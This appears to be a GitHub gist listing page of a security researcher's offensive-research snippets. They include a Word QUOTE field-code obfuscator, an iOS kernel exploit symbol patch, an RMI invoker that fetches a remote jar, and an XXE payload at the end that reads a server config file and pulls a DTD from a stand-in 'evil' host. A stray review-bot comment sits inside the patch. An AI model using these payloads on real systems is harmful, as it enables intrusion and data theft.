#!/usr/bin/env python
print("Converts a string to the {QUOTE} Field code")
st = raw_input("String to convert: ")
v = map(lambda y: "%s"%ord(y),st)
print("{ QUOTE %s }"%' '.join(v))
@staaldraad
staaldraad / Dockerfile
Created September 4, 2018 16:13
Dockerfile to get a malicious git Repository up and running
FROM ubuntu:16.04
RUN apt update ; \
apt install -y git apache2
RUN mkdir /srv/git
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
@staaldraad
staaldraad / ioctlfilter.c
Created March 21, 2017 13:56
Filters keycodes from R400 presenter in Linux
/* Grabs all input from Logitech R400 presenter and filters to ensure only certain keys are pressed.
* Ensures that only valid R400 keys are pressed and not rogue keys injected.
* Main logic for this found here: http://stackoverflow.com/questions/7668872/need-to-intercept-hid-keyboard-events-and-then-block-them
* Author: Etienne Stalmans <etienne@sensepost.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
@staaldraad
staaldraad / async_ios_11_1_2.patch
Last active May 2, 2019 07:02
Add iPhone 6 symbols along with the symbols @cji added for iPad mini 2.
--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};
+uint64_t ksymbols_iphone_6_15b202[] = {
+ 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
+ 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+ 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
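Review bot: the comment on the first new entry, `// KSYMBOL_OSARRAY_GET_META_CLASS,`, carries a trailing comma that the following entries and the existing array omit; drop it so the comment style stays consistent. The new `ksymbols_iphone_6_15b202[]` array also lacks the derivation hints the existing entries carry (the context line above notes `// look for xrefs to "Unsupported Class %u event code."`); adding an equivalent hint per symbol, or a header comment naming the build the addresses were taken from, would let a reviewer re-verify the offsets.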
@staaldraad
staaldraad / docker-compose.yml
Created June 12, 2017 09:17
A docker-compose yml to use with Doorman and osquery
version: '2'
services:
doorman:
image: doorman
container_name: "doorman"
build:
context: ./doorman
dockerfile: Dockerfile_doorman
links:
@staaldraad
staaldraad / pyrmi.py
Last active December 1, 2018 21:09
Quick and dirty RMI invoker
#!/usr/bin/python
"""
Python implementation of RMI invoker. Should try to fetch a .jar from a server we control.
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 08/10/2014 - v0.1
"""
import socket
import binascii
Add-Type -assembly "Microsoft.Office.Interop.Outlook";
$outlook = New-Object -comobject Outlook.Application;
$mapi = $outlook.GetNamespace("MAPI")
$fld = $outlook.Session.GetDefaultFolder(6);
$t = $fld.GetTable("[MessageClass] = 'IPM.Microsoft.FolderDesign.FormsDescription'",1);
$c = $t.GetRowCount();
while($c -gt 0) {
$r = $t.GetNextRow();
$itm = $mapi.GetItemFromID($r.item(1));

Keybase proof

I hereby claim:

  • I am staaldraad on github.
  • I am staaldraad (https://keybase.io/staaldraad) on keybase.
  • I have a public key ASBLRjbIk9YHmGLclVKxEorNIKsYZgbdW0uh0ugCrhdGYwo

To claim this, I am signing this object:

@staaldraad
staaldraad / Dockerfile
Last active June 6, 2018 14:20
Use Docker to run @sensepost Mana like a hipster
# Mana-toolkit from @sensepost
#
# VERSION 0.1
FROM ubuntu
MAINTAINER Etienne Stalmans, etienne@sensepost.com
RUN apt-get update && apt-get install -y \
unzip \
@staaldraad
staaldraad / xxe
Created July 7, 2014 18:11
XXE remote dtd
Payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>